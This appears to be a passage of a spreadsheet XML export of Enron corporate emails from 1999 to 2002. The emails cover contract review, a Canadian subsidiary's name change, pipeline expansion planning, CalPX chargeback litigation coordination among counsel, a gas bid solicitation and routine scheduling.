"Brown, Ronald" &lt;Ronald_Brown@kne.com&gt; on 04/18/2000 01:54:06 PM_x000D_
To: "'gerald.nemec@enron.com'" &lt;gerald.nemec@enron.com&gt;_x000D_
cc:  _x000D_
Subject: FW: Trailblazer CA_x000D_
_x000D_
_x000D_
My comments are shown redlined.  Let me know if you have any problems with_x000D_
my changes._x000D_
_x000D_
-----Original Message-----_x000D_
From: Gerald Nemec [mailto:Gerald.Nemec@enron.com]_x000D_
Sent: Friday, April 14, 2000 10:05 AM_x000D_
To: ronald_brown@kindermorgan.com_x000D_
Cc: Jamie Ginsberg_x000D_
Subject: Trailblazer CA_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Per Jaime Ginsberg's request, I am forwarding our form of Confidentiality_x000D_
Agreement for your review._x000D_
_x000D_
(See attached file: TrailBlazerCA.doc)_x000D_
_x000D_
_x000D_
 - TrailBlazerCA.doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 18 Apr 2001 11:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/18/01; HourAhead hour: 19;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t>Start Date: 4/18/01; HourAhead hour: 19;  No ancillary schedules awarded.  No _x000D_
variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001041819.txt</t>
  </si>
  <si>
    <t>Tue, 31 Aug 1999 08:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'joya.davis@enron.com', 'travis.mccullough@enron.com', 'robin.jordan@enron.com', 'stuart.zisman@enron.com', 'becky.tlucek@enron.com', 'karen.jones@enron.com', 'lance.legal@enron.com', 'janice.moore@enron.com', 'sandi.braband@enron.com', 'kaye.ellis@enron.com', 'brenda.whitehead@enron.com', 'genia.fitzgerald@enron.com', 'jeffrey.hodge@enron.com', 'bob.carter@enron.com', 'doug.pedigo@enron.com', 'susan.bailey@enron.com', 'wende.warren@enron.com', 'linda.simmons@enron.com', 'deb.korkmas@enron.com', 'twanda.sweet@enron.com', 'linda.noske@enron.com', 'peggy.banczak@enron.com', 'dale.rasmussen@enron.com', 'cynthia.harkness@enron.com', 'sheila.tweed@enron.com', 'ann.white@enron.com', 'richard.sanders@enron.com', 'erica.braden@enron.com', 'janet.moore@enron.com', 'teresa.bushman@enron.com', 'barbara.gray@enron.com', 'elizabeth.sager@enron.com', 'sylvia.sauseda@enron.com', 'barton.clark@enron.com', 'shonnie.daniel@enron.com', 'mark.taylor@enron.com', 'jenny.helton@enron.com', 'mark.haedicke@enron.com', 'stacy.dickson@enron.com', 'monica.jordan@enron.com', 'robert.walker@enron.com', 'ed.iii@enron.com', 'dan.hyvl@enron.com', 'dan.lyons@enron.com', 'kay.young@enron.com', 'sara.shackleton@enron.com', 'pat.radford@enron.com', 'susan.flynn@enron.com', 'shari.stack@enron.com', 'gerald.nemec@enron.com', 'chris.gaffney@enron.com', 'joyce.dorsey@enron.com', 'wayne.gresham@enron.com', 'merrill.haas@enron.com', 'gareth.bahlmann@enron.com', 'mary.heinitz@enron.com', 'shawna.flynn@enron.com', 'marie.heard@enron.com', 'debra.perlingiere@enron.com', 'harry.collins@enron.com', 'nony.flores@enron.com', 'kristina.mordaunt@enron.com', 'michael.robison@enron.com', 'tana.jones@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'carol.clair@enron.com', 'sheri.cromwell@enron.com', 'alan.aronowitz@enron.com', 'kimberlee.bennick@enron.com', 'suzanne.adams@enron.com', 'peter.vecchio@enron.com', 'steve.hooser@enron.com', 'linda.guinn@enron.com', 'mary.cook@enron.com', 'michelle.cash@enron.com', 'lisa.mellencamp@enron.com'})</t>
  </si>
  <si>
    <t>ECT Canada to Enron Canada Corp. Name Change</t>
  </si>
  <si>
    <t xml:space="preserve">Please see attached email from Greg Johnston, new attorney in Calgary.  _x000D_
Thanks, Deb_x000D_
---------------------- Forwarded by Deb Korkmas/HOU/ECT on 08/31/99 03:43 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Greg Johnston_x000D_
08/31/99 03:28 PM_x000D_
Sent by: Linda Sietzema_x000D_
To: Scott Adams/CAL/ECT@ECT, Shawn Anderson/CAL/ECT@ECT, Robert _x000D_
Benson/CAL/ECT@ECT, Karina Berrade/CAL/ECT@ECT, Jason Biever/CAL/ECT@ECT, _x000D_
Christopher F Calger/CAL/ECT@ECT, Kate Chaney/CAL/ECT@ECT, Janice _x000D_
Christianson/CAL/ECT@ECT, Chad Clark/CAL/ECT@ECT, Michael Cowan/CAL/ECT@ECT, _x000D_
Duncan Croasdale/CAL/ECT@ECT, Derek Davies/CAL/ECT@ECT, Cheryl _x000D_
Dawes/CAL/ECT@ECT, Bali Dey/CAL/ECT@ECT, Dan Dietrich/CAL/ECT@ECT, John _x000D_
Disturnal/CAL/ECT@ECT, Kerry Dockstader/CAL/ECT@ECT, Chris _x000D_
Dorland/CAL/ECT@ECT, Dawn Doucet/CAL/ECT@ECT, Lon Draper/CAL/ECT@ECT, _x000D_
Lorraine Duerr/CAL/ECT@ECT, Ian Dundas/CAL/ECT@ECT, Kathleen _x000D_
Dunn/CAL/ECT@ECT, Grant Farn/CAL/ECT@ECT, Richard Gebauer/CAL/ECT@ECT, John _x000D_
Gorman/CAL/ECT@ECT, Geri Greenall/CAL/ECT@ECT, Bill Greenizan/CAL/ECT@ECT, _x000D_
Michelle Gulka/CAL/ECT@ECT, Jeff Haskey/CAL/ECT@ECT, Jai Hawker/CAL/ECT@ECT, _x000D_
Kevin Heal/CAL/ECT@ECT, Peggy E Hedstrom/CAL/ECT@ECT, Robert _x000D_
Hemstock/CAL/ECT@ECT, Joy Henderson/CAL/ECT@ECT, Ione Irvine/CAL/ECT@ECT, _x000D_
Jaimie Jessop/CAL/ECT@ECT, Lori Johnson/CAL/ECT@ECT, Greg _x000D_
Johnston/CAL/ECT@ECT, Craig Johnstone/CAL/ECT@ECT, Rob Kehrig/CAL/ECT@ECT, _x000D_
Peter Keohane/CAL/ECT@ECT, Kyle Kitagawa/CAL/ECT@ECT, Brian _x000D_
Kristjansen/CAL/ECT@ECT, Gina LaVallee/CAL/ECT@ECT, John J _x000D_
Lavorato/CAL/ECT@ECT, Cliff Lawrick/CAL/ECT@ECT, Eric LeDain/CAL/ECT@ECT, _x000D_
Jill Louie/CAL/ECT@ECT, Derek Lynn/CAL/ECT@ECT, Suzanne Mallarky/CAL/ECT@ECT, _x000D_
Brad Martin/CAL/ECT@ECT, Angela McCulloch/CAL/ECT@ECT, Jonathon _x000D_
McKay/CAL/ECT@ECT, Rob Milnthorp/CAL/ECT@ECT, Desrae Nicholson/CAL/ECT@ECT, _x000D_
Grant Oh/CAL/ECT@ECT, Carla M O'Neil/CAL/ECT@ECT, Cyntia Pastega/CAL/ECT@ECT, _x000D_
Doug Paterson/CAL/ECT@ECT, Attila Pazmandi/CAL/ECT@ECT, Diane _x000D_
Peers/CAL/ECT@ECT, Karen Politsky/CAL/ECT@ECT, Liz Prior/CAL/ECT@ECT, Tony _x000D_
Rafaat/CAL/ECT@ECT, David Redmond/CAL/ECT@ECT, Kathy Reeves/CAL/ECT@ECT, _x000D_
Beverly Reid/CAL/ECT@ECT, Dianne Ripley/CAL/ECT@ECT, Laura E _x000D_
Scott/CAL/ECT@ECT, Dianne Seib/CAL/ECT@ECT, Stacey Shorrock/CAL/ECT@ECT, _x000D_
Linda Sietzema/CAL/ECT@ECT, Melanie Strong/CAL/ECT@ECT, Andre _x000D_
Templeman/CAL/ECT@ECT, Barry Tycholiz/CAL/ECT@ECT, Walt Tyrrell/CAL/ECT@ECT, _x000D_
Nikole Vander Velde/CAL/ECT@ECT, Laura E Webner/CAL/ECT@ECT, Rob _x000D_
Weissenborn/CAL/ECT@ECT, Melinda Whalen/CAL/ECT@ECT, Chris Wiebe/CAL/ECT@ECT, _x000D_
Iris Wong/CAL/ECT@ECT, Stephane Brodeur/TOR/ECT@ECT, Aleck _x000D_
Dadson/TOR/ECT@ECT, Cindy Derecskey/TOR/ECT@ECT, Paul Devries/TOR/ECT@ECT, _x000D_
Jan Wilson/TOR/ECT@ECT_x000D_
cc: Mark E Haedicke/HOU/ECT@ECT, Mary Solmonson/HOU/ECT@ECT, Deb _x000D_
Korkmas/HOU/ECT@ECT _x000D_
Subject: ECT Canada to Enron Canada Corp. Name Change_x000D_
_x000D_
Please be advised that effective Wednesday, September 1, 1999, our new legal _x000D_
name will be changed from "Enron Capital &amp; Trade Resources Canada Corp." to _x000D_
"Enron Canada Corp.".  Commencing September 1, 1999, we will use this full _x000D_
legal name for all contracts, invoices, negotiable instruments and orders for _x000D_
goods and services._x000D_
_x000D_
For more informal business usage, we will be using "Enron Canada" or "ECC"._x000D_
_x000D_
If you have any questions or concerns with respect to letterhead, e-mail _x000D_
addresses, business cards, etc., please contact Iris Wong._x000D_
_x000D_
Thanks, _x000D_
Greg </t>
  </si>
  <si>
    <t>Tue, 19 Dec 2000 01:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Returned mail: Host unknown (Name server: enron: host not found)</t>
  </si>
  <si>
    <t xml:space="preserve">Danny, I'm resending as I had the same problem Cindy did.  I'll give you a _x000D_
call later today after I've talked to Harris to discuss the various Gallup _x000D_
scenarios to make sure you and I are on the same page.   The plan that makes _x000D_
the most sense in my mind is to ram the 10,000/d  project through asap, with _x000D_
no firm contracts to preserve our options on a NEWCO structure.  We'll _x000D_
simultaneously implement a new approach on San Juan fuel transport if _x000D_
possible and then throw the big expansion into the hopper at FERC in January _x000D_
as Stan suggested.  I hope that timetable is doable--it all depends on _x000D_
planning/ops deciding what they want to build and then clearing our financial _x000D_
hurdles.   DF_x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 12/19/2000 _x000D_
09:31 AM ---------------------------_x000D_
_x000D_
_x000D_
Mail Delivery Subsystem &lt;Mailer-Daemon@postmaster.enron.com&gt; on 12/19/2000 _x000D_
09:14:48 AM_x000D_
To: &lt;Drew.Fossum@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Returned mail: Host unknown (Name server: enron: host not found)_x000D_
_x000D_
_x000D_
The original message was received at Tue, 19 Dec 2000 15:14:48 GMT_x000D_
from [172.28.10.37]_x000D_
_x000D_
   ----- The following addresses had permanent fatal errors -----_x000D_
&lt;Danny.McCarty/ET&amp;S@enron&gt;_x000D_
_x000D_
   ----- Transcript of session follows -----_x000D_
550 &lt;Danny.McCarty/ET&amp;S@enron&gt;... Host unknown (Name server: enron: host not _x000D_
found)_x000D_
_x000D_
   ----- Original message follows -----_x000D_
_x000D_
Return-Path: &lt;Drew.Fossum@enron.com&gt;_x000D_
Received: from nahou-msmsw01px.corp.enron.com ([172.28.10.37])_x000D_
 by postmaster.enron.com (8.8.8/8.8.8/postmaster-1.00) with ESMTP id PAA28509_x000D_
 for &lt;Danny.McCarty/ET&amp;S@enron&gt;; Tue, 19 Dec 2000 15:14:48 GMT_x000D_
From: Drew.Fossum@enron.com_x000D_
Received: from ene-mta01.enron.com (unverified) by _x000D_
nahou-msmsw01px.corp.enron.com_x000D_
 (Content Technologies SMTPRS 4.1.5) with ESMTP id _x000D_
&lt;Tac1c0a255093193855@nahou-msmsw01px.corp.enron.com&gt; for _x000D_
&lt;Danny.McCarty/ET&amp;S%Enron..@enron.com&gt;;_x000D_
 Tue, 19 Dec 2000 09:14:47 -0600_x000D_
Subject: Re: Gallup Mods_x000D_
To: Stanley.Horton@enron.com_x000D_
Cc: Danny.McCarty@Enron, Phil.Lowry@enron.com, Steven.Harris@enron.com,_x000D_
        Mary.Kay.Miller@enron.com_x000D_
Date: Tue, 19 Dec 2000 09:14:52 -0600_x000D_
Message-ID: &lt;OF81D15B0D.93531BF9-ON862569BA.00529275@enron.com&gt;_x000D_
X-MIMETrack: Serialize by Router on ENE-MTA01/Enron(Release 5.0.4 |June 8, _x000D_
2000) at 12/19/2000_x000D_
 09:14:30 AM_x000D_
MIME-Version: 1.0_x000D_
Content-type: text/plain; charset=us-ascii_x000D_
_x000D_
_x000D_
I agree with Danny's email that the key timetable issue for the incremental_x000D_
10,000/day appears to be lead time on fabrication and delivery of the_x000D_
15,000hp motor.  It was my understanding that the long lead time items were_x000D_
going to be ordered shortly (if they haven't been already) and that we'd_x000D_
take the financial risk.  If that is our approach, the regulatory approvals_x000D_
won't be the critical path item they usually are.  I've reviewed the FERC_x000D_
application and we should be able to file it shortly, perhaps with a_x000D_
request for temporary emergency certification if we decide that would_x000D_
expedite things.  Additionally, we are looking at transactions that would_x000D_
allow us to avoid physically hauling the 20,000/day of fuel down the San_x000D_
Juan lateral.  If we could unload our fuel requirement from the San Juan,_x000D_
the additional horsepower at Gallup might provide some additional_x000D_
flexibility or additional capacity.   I'll talk to Steve today to make sure_x000D_
we are doing everything possible to expedite these efforts.  DF_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Stanley Horton_x000D_
12/19/2000 07:25 AM_x000D_
_x000D_
To:   Danny McCarty/ET&amp;S@Enron ._x000D_
cc:   Drew Fossum/ET&amp;S/Enron@ENRON, Phil Lowry/OTS/Enron@ENRON_x000D_
_x000D_
Subject:  Re: Gallup Mods  (Document link: Drew Fossum)_x000D_
_x000D_
I believe that Phil Lowry is looking at ways to get some additional_x000D_
capacity out of the system as well.  We want to expedite these efforts_x000D_
too..  I would like to see an application filed filed by January 31st to_x000D_
get 30 to 50 MMCF/D._x000D_
_x000D_
Steve Harris and Phil Lowry should have the lead to get this done.  I am_x000D_
willing to construct at risk but want to see the financials as well._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 04:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>E-Mail Retention Policy</t>
  </si>
  <si>
    <t>Call Bob's asst and see if I need to participate. I was supposed to be on the _x000D_
last call, which never happened._x000D_
----- Forwarded by Richard B Sanders/HOU/ECT on 11/30/2000 12:20 PM -----_x000D_
_x000D_
	Stephanie Truss@ENRON_x000D_
	11/29/2000 03:12 PM_x000D_
		 _x000D_
		 To: Alan Black@ECT, Richard B Sanders@ECT, Chris Behney/Corp/Enron@Enron, _x000D_
Robert C Williams/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
		 cc: jfeldman@forensics.com_x000D_
		 Subject: E-Mail Retention Policy_x000D_
_x000D_
Joan Feldman is available on December 12 to conduct a conference call on the _x000D_
e-mail retention policy.  Please let me know if you will be available on that _x000D_
date.  Thank you.</t>
  </si>
  <si>
    <t>Mon, 23 Jul 2001 10:34:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stephen_johns@agfg.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Darron,_x000D_
_x000D_
Marketing would be my first choice.  Something in HR working in benefits_x000D_
would be second._x000D_
_x000D_
Thanks for your help_x000D_
_x000D_
SJ_x000D_
_x000D_
(See attached file: resume2.doc)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Giron, Darron C." &lt;Darron.C.Giron@ENRON.com&gt; on 07/20/2001 01:12:56 PM_x000D_
_x000D_
To:   &lt;stephen_johns@agfg.com&gt;_x000D_
cc:_x000D_
_x000D_
Subject:  Enron_x000D_
_x000D_
_x000D_
Send me your resume and maybe what kind of work you're interested in,_x000D_
and I'll see what I can do._x000D_
_x000D_
DG_x000D_
_x000D_
_x000D_
_x000D_
 - resume2.doc </t>
  </si>
  <si>
    <t>Tue, 18 Apr 2000 10:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Caledonia Letter To TVA</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Elizabeth Sager/HOU/ECT on 04/18/2000 _x000D_
05:00 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Kevin M Presto                           04/18/2000 04:55 PM_x000D_
	_x000D_
_x000D_
To: Mitch Robinson/Corp/Enron@ENRON_x000D_
cc: Steve Walton/HOU/ECT@ECT, Elizabeth Sager/HOU/ECT@ECT _x000D_
Subject: Re: Caledonia Letter To TVA  _x000D_
_x000D_
I will probably sign the Agreement._x000D_
_x000D_
We need to send a letter to TVA appointing the Operating Representatives for _x000D_
the 4 Interconnection Agreements.   I recommend yourself and Lloyd Will be _x000D_
the Enron representatives for the respective Agreements.  I have a previous _x000D_
letter in the file (get from Felicia) that you can use a template to create _x000D_
the new letter appointing our Operating Reps.  In that letter, we should also _x000D_
include the new Enron Contact List (Plants Ops and Control Center Ops)._x000D_
</t>
  </si>
  <si>
    <t>Mon, 6 Mar 2000 03:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Hidroelectrica Diamante</t>
  </si>
  <si>
    <t xml:space="preserve">Per my email, you will need Julian on the phone due to the language problem.  _x000D_
All else is in Lotus Notes.  Sara_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Rod Nelson                           03/06/2000 10:45 AM_x000D_
	_x000D_
_x000D_
To: Sara Shackleton/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Hidroelectrica Diamante_x000D_
_x000D_
I am ready to call the cp to discuss credit issues.  Will you be on the _x000D_
call?  If not, I will need a phone number._x000D_
_x000D_
Rod_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 2 Feb 2001 10:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gerspamer@mofo.com', 'awu@qeuo.com', 'rcarroll@bracepatt.com', 'thord@perkinscoie.com', 'phillip_fantle@cargill.com', 'rcjosephson@stoel.com', 'rbeitler@sempratrading.com', 'richard.b.sanders@enron.com', 'pfox@bracepatt.com', 'sbishop@gibbs-bruns.com', 'jheath@fulbright.com', 'jstamper@omm.com', 'timothy.bolden@pinnaclewest.com', 'jfrizzell@gibbs-bruns.com', 'theftler@stroock.com', 'mbrosterman@stroock.com', 'hao@qeuo.com', 'elizabeth.sager@enron.com', 'ayudkowsky@strook.com', 'dmbutz@butzdunn.com', 'nancy.loftin@pinnaclewest.com', 'jdalfano@srpnet.com', 'john.fryer@pacificorp.com', 'hes@vnf.com', 'mgoldstein@stroock.com', 'mghelms@jsslaw.com', 'cgunter@bracepatt.com', 'sstack@enron.com', 'kirvin@mofo.com', 'dwatkiss@bracepatt.com', 'gbd@vnf.com', 'pjazayeri@stroock.com', 'aorchard@smud.org', 'bcurrey@omm.com', 'psteele@coral-energy.com', 'andrzej_kabarowski@cargill.com', 'gkeltner@jsslaw.com', 'wdsmith@sempra.com', 'cfr@vnf.com'})</t>
  </si>
  <si>
    <t>CalPX FERC and Informational Meeting</t>
  </si>
  <si>
    <t>Prepared in Anticipation of Litigation_x000D_
_x000D_
Here is the list of counsel that attended today's conference call regarding_x000D_
public events involving the California Power Exchange Corporation.  I_x000D_
delayed publishing this list until 6:00 p.m. because I kept receiving emails_x000D_
from interested parties.  I also received the following report from John_x000D_
Stamper at O'Melveny &amp; Myers who represents SEMPRA and San Diego Gas &amp;_x000D_
Electric._x000D_
_x000D_
John had a conversation with Bob Moore from Millbank representing the_x000D_
California PX.  Bob apparently told John that invoices for the chargebacks_x000D_
will be issued on Monday February 5th and will be due and payable by_x000D_
Thursday February 8th or Friday February 9th.  John asked for February 9th_x000D_
rather than the 8th.  John raised again the possibility of a standstill_x000D_
agreement.  Bob Moore reported that the CalPX was amenable to a standstill_x000D_
agreement if everybody agreed.  They are worried, however, about being sued_x000D_
for failing to liquidate collateral as soon as they are able etc.  John_x000D_
pointed out that the CalPX might be subject to claims from those entities_x000D_
that had their letters of credit drawn down improperly.  Bob then reported_x000D_
that the number one option that the  CalPX was considering was bankruptcy._x000D_
It seems to them to be the one forum where they can get all the parties._x000D_
They are also considering dissolution and invoking the ADR procedure_x000D_
themselves._x000D_
_x000D_
We have scheduled a teleconference to discuss the FERC options for 11:00_x000D_
a.m. PST on Monday February 5, 2001.  The call in number is 1-800-205-3434,_x000D_
participant code: 653687_x000D_
_x000D_
I have also received a request to schedule an alternative teleconference for_x000D_
1:00 p.m. PST to consider non-FERC alternatives.  This would include_x000D_
litigation alternatives.  We will distribute the dial in number and access_x000D_
code for that call on Monday morning._x000D_
_x000D_
Proposed Agenda for 11:00 a.m. FERC Option Teleconference:_x000D_
_x000D_
I. Current Status of any proposed filings._x000D_
 Note:  Phil Fantle, in-house counsel for Cargill-Alliant sent me a_x000D_
copy of a filing they made  with FERC on January 29th.  I will send a_x000D_
copy under separate email cover._x000D_
II. Discussion of specific relevant examples where CalPX has violated_x000D_
the tariff with respect to  specific PX Participants.  The purpose of_x000D_
gathering these examples is to be able to  demonstrate that CalPX is_x000D_
acting arbitrarily and capriciously if that is case.  This could_x000D_
include identification of specific instances of inconsistent treatment of PX_x000D_
Participants or  inconsistent treatment of the same PX Participant._x000D_
_x000D_
 For example, Phil Fantle pointed out that the way he reads the_x000D_
tariff, if you look at the  chargeback formula set forth in Schedule 2,_x000D_
Section 5.3, the ratio for each PX Participant  appears to be a fixed number_x000D_
that  does not vary after the default of another PX Participant.     In_x000D_
Phil's example, if a defaulting participant has a 25% share of the gross_x000D_
MWHs sold in the Core market, during the chargeback process only 75%_x000D_
of the default is paid through  chargeback because there is no provision for_x000D_
recalculating the chargeback formula._x000D_
_x000D_
III. Summary of best arguments of why CalPX application of charge-back is_x000D_
inconsistent with  tariff._x000D_
IV. Impact of Governor Davis' "commandeering" of SCE block forward_x000D_
contracts._x000D_
_x000D_
 &lt;&lt;Cal PX Contact List.DOC&gt;&gt;_x000D_
_x000D_
Thanks_x000D_
Gary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Cal PX Contact List.DOC</t>
  </si>
  <si>
    <t>Wed, 17 May 2000 11:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>PNM filing: shipper must have title</t>
  </si>
  <si>
    <t xml:space="preserve"> When the Commission granted Texas Eastern authority to hold capacity on _x000D_
another pipeline in Texas Eastern Transmission Corporation, 74 FERC P 61,074 _x000D_
(1996), it stated that when a pipeline holds capacity on an upstream _x000D_
pipeline, the downstream pipeline's customers may hold title to the gas _x000D_
transported on the upstream pipeline.  The Commission recognized this as one _x000D_
of the limited exceptions to the shipper must have title rule.  Specifically, _x000D_
the Commission stated:  _x000D_
_x000D_
The downstream pipeline will not hold title to gas shipped on capacity it has _x000D_
acquired on an upstream _x000D_
pipeline. Rather, shippers on the downstream pipeline will hold title to the _x000D_
gas on the upstream _x000D_
pipeline. We will allow a pipeline to hold the upstream capacity; we will _x000D_
not, however, allow the pipeline _x000D_
to hold title to the gas being shipped.  Thus, the downstream pipeline will _x000D_
be the shipper on the upstream _x000D_
pipeline, but will not hold title when the gas is being shipped. This results _x000D_
in a limited exception to the rule _x000D_
that a shipper must hold title to gas being shipped. _x000D_
_x000D_
I believe that if we can address the Commission's other concerns about this _x000D_
filing, they will grant a similar waiver for this transaction.  You can feel _x000D_
free to pass this along to your contact at PNM.</t>
  </si>
  <si>
    <t>Tue, 2 Apr 2002 07:58:19 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tom.ward@enron.com'})</t>
  </si>
  <si>
    <t>RE: Schedule for April 2nd</t>
  </si>
  <si>
    <t xml:space="preserve">What is your email address.  Is there a space between Tom and Ward?_x000D_
 _x000D_
Lisa_x000D_
_x000D_
-----Original Message-----_x000D_
From: WARD, TOM _x000D_
Sent: Tuesday, April 02, 2002 5:32 AM_x000D_
To: Gang, Lisa_x000D_
Subject: Re: Schedule for April 2nd_x000D_
_x000D_
_x000D_
please add me to your mailing list._x000D_
_x000D_
&gt;&gt;&gt; "Gang, Lisa" &lt;Lisa.Gang@ENRON.com&gt; 04/01/02 01:10PM &gt;&gt;&gt;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Fri, 2 Feb 2001 02:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Goals &amp; Objectives for 2001</t>
  </si>
  <si>
    <t xml:space="preserve">Sure thing.  Liz_x000D_
_x000D_
_x000D_
From: Cathy Phillips on 02/02/2001 07:28 AM_x000D_
To: Greg Whalley/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Goals &amp; Objectives for 2001  _x000D_
_x000D_
Hi Liz -_x000D_
_x000D_
Thanks for copying me on this message.  Mike is in Venezuela and Jeff is on _x000D_
vacation.  They should both be back in the office on Monday.  Will you please _x000D_
relay this information to Greg.  Yesterday evening I called and left a _x000D_
voicemail for Mike relaying this message._x000D_
_x000D_
Thanks._x000D_
_x000D_
Cathy P._x000D_
X-36898_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Greg Whalley_x000D_
	Sent by: Liz M Taylor_x000D_
	02/01/2001 04:33 PM_x000D_
		 _x000D_
		 To: Mike McConnell/HOU/ECT@ECT_x000D_
		 cc: Cathy Phillips/HOU/ECT@ECT, Jeffrey A Shankman/HOU/ECT@ECT, Jennifer _x000D_
Burns/HOU/ECT@ECT_x000D_
		 Subject: Goals &amp; Objectives for 2001_x000D_
_x000D_
Mike,_x000D_
_x000D_
Greg is requesting Enron Global Markets' 2001 Goals &amp; Objectives (no more _x000D_
than 3 to 4 each) asap.  _x000D_
_x000D_
_x000D_
Many Thanks,_x000D_
_x000D_
Liz Taylor_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Nov 2001 07:31:34 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'isingh@pli.edu'})</t>
  </si>
  <si>
    <t>SWAPs &amp; Other Derivatives</t>
  </si>
  <si>
    <t>Dear Mr. Taylor:_x000D_
_x000D_
I am writing to remind you that you are scheduled to participate in SWAPs &amp;_x000D_
Other Derivatives in 2001, which will be held on November 12-13, 2001 at the_x000D_
PLI New York Center, 810 Seventh Avenue, 21st Floor._x000D_
_x000D_
You are scheduled to speak Tuesday, November 13th, 2001 at 11:15 a.m. on_x000D_
Energy, Electricity, Bandwidth/Telecommunications Derivatives._x000D_
_x000D_
In order to ensure adequate preparation for your presentation, please_x000D_
forward all audio/visual equipment requests to me as soon as possible._x000D_
_x000D_
If you plan on using a PowerPoint Presentation for the program, please_x000D_
proceed as follows:_x000D_
_x000D_
	*	E-mail a copy (specifying Program title, date and time of_x000D_
your presentation) no later than Friday, November 9th, at 3:00 p.m. EST to:_x000D_
			o	lcorrea@pli.edu_x000D_
			o	isingh@pli.edu_x000D_
_x000D_
	*	If you are unable to send an e-mail copy please bring a_x000D_
floppy disk containing your presentation to the program._x000D_
_x000D_
	*	If you would like to distribute any material in addition to_x000D_
those in the handbook, please make sure to deliver sufficient copies_x000D_
(approximately 200) for all registrants to:_x000D_
				Practising Law Institute_x000D_
				Attn: Adele Tanner_x000D_
				Program: SWAPs_x000D_
				810 Seventh Avenue - 21st Floor_x000D_
				New York, NY 10019_x000D_
_x000D_
	*Please make sure that the copies arrive the day before you are_x000D_
scheduled to speak._x000D_
_x000D_
For further clarification, please contact me at (212) 824 - 5808._x000D_
_x000D_
_x000D_
Very truly yours,_x000D_
Indira Singh_x000D_
Program Assistant_x000D_
Practising Law Institute_x000D_
810 Seventh Avenue_x000D_
New York, NY 10019_x000D_
Tel: (212) 824 - 5808_x000D_
Fax: (212) 824-5871_x000D_
isingh@pli.edu_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
***********************************************_x000D_
PLI declines to enter, or be bound by, any_x000D_
agreement involving electronic signatures._x000D_
***********************************************_x000D_
_x000D_
Visit us at www.pli.edu.</t>
  </si>
  <si>
    <t>Thu, 28 Jun 2001 10:52:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'phil.polsky@enron.com'})</t>
  </si>
  <si>
    <t>FW: Q3 Gas Bid</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Dolan, Jack" &lt;JDolan@ci.glendale.ca.us&gt;@ENRON [mailto:IMCEANOTES-+22Dolan+2C+20Jack+22+20+3CJDolan+40ci+2Eglendale+2Eca+2Eus+3E+40ENRON@ENRON.com] _x000D_
Sent:	Thursday, June 28, 2001 12:37 PM_x000D_
Cc:	Silva, Lawrence; Troncoso, Ignacio; Lovejoy, Gregory_x000D_
Subject:	Q3 Gas Bid_x000D_
_x000D_
Glendale Water &amp; Power is soliciting bids to purchase summer gas._x000D_
_x000D_
Term - Q3, 2001_x000D_
Amount - 2,000, 3,000 and 4,000 per day_x000D_
Delivery - SoCal border_x000D_
Product - Physical_x000D_
_x000D_
Please submit your bids by fax (818) 552-2852, by 10 AM, Friday, June_x000D_
29,2001._x000D_
Bids must be held open for 2 hours, until 12 Noon, Friday._x000D_
_x000D_
Glendale reserves the right to refuse any and all bids._x000D_
_x000D_
Coral Power will have the right to match bids._x000D_
_x000D_
If you have any questions please call me or Larry Silva._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jack Dolan_x000D_
Energy Marketer / Trader_x000D_
City of Glendale_x000D_
Water &amp; Power_x000D_
voice (818) 548-3247_x000D_
fax    (818) 552-2952_x000D_
e-mail  jdolan@ci.glendale.ca.us</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 23:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'nobody@sfgate.com'})</t>
  </si>
  <si>
    <t>SF Gate: Power Board's Industry Ties May Be Cut/Federal regulators_x000D_
 consider making deregulation's creation independent</t>
  </si>
  <si>
    <t xml:space="preserve"> Here is second related article_x000D_
----------------------------------------------------------------------_x000D_
This article was sent to you by someone who found it on SF Gate._x000D_
The original article can be found on SFGate.com here:_x000D_
